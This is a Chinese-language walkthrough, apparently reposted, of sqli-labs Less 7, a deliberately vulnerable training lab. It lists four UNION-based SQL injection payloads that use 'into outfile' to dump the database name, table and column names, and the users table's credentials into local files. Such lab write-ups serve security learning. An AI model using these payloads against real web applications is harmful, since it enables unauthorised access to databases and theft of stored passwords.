sqli-labs less7 GET-Dump into outfile-string

1、获取数据库名

id=-1')) union select 1,2,database() into outfile "E:/wampserver/wamp/tmp/1.txt" lines terminated by '\r\n'--+   //每行以换行符结尾

sqli-labs less7 GET-Dump into outfile-string_第1张图片

 

 2、获取security中的表

id=-1')) union select  1,2 ,table_name from information_schema.tables where table_schema='security' into outfile "E:/wampserver/wamp/tmp/2.txt"--+

sqli-labs less7 GET-Dump into outfile-string_第2张图片

手动换行后

sqli-labs less7 GET-Dump into outfile-string_第3张图片

3、获取users中的字段

id=-1')) union select 1,2,column_name from information_schema.columns where table_name='users' and table_schema='security' into outfile "E:/wampserver/wamp/tmp/3.txt"--+

sqli-labs less7 GET-Dump into outfile-string_第4张图片

 sqli-labs less7 GET-Dump into outfile-string_第5张图片

4、获取users表中的所有数据

id=-1')) union select id,username,password from users into outfile "E:/wampserver/wamp/tmp/4.txt"--+

sqli-labs less7 GET-Dump into outfile-string_第6张图片

sqli-labs less7 GET-Dump into outfile-string_第7张图片

 

转载于:https://www.cnblogs.com/jielun/p/10914968.html

你可能感兴趣的:(sqli-labs less7 GET-Dump into outfile-string)